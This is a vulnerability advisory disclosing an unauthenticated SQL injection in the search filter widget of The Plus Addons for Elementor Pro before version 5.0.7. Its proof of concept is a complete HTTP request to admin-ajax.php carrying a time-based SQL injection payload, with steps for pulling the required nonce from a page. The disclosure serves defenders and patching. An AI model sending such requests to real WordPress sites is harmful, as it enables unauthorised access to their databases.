WordPress Plugin Vulnerabilities
The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection
Description
The "WP Search Filters" widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection
Proof of Concept
The request requires a nonce (created with wp_create_nonce("theplus-searchfilterā€¯)) which can be retrieved from a page where the widget is present, by looking at the source for "security".
POST /wp-admin/admin-ajax.php HTTP/2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
action=theplus_filter_post&nonce=b74e4cfaa0&option[0][filtertype]=search_list&option[0][post_type]=product&option[0][seapara][0][type]=taxonomy&option[0][seapara][0][field]=rating&option[0][seapara][0][value]=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))SQLi) Affects Plugins
Fixed in version 5.0.7
References
Classification
Miscellaneous
Original Researcher
Nicolas Vidal from TEHTRIS
Submitter
Nicolas Vidal from TEHTRIS
Verified
Yes
Timeline
Publicly Published
2021-12-13 (about 1 years ago)
Added
2021-12-13 (about 1 years ago)
Last Updated
2022-04-11 (about 9 months ago)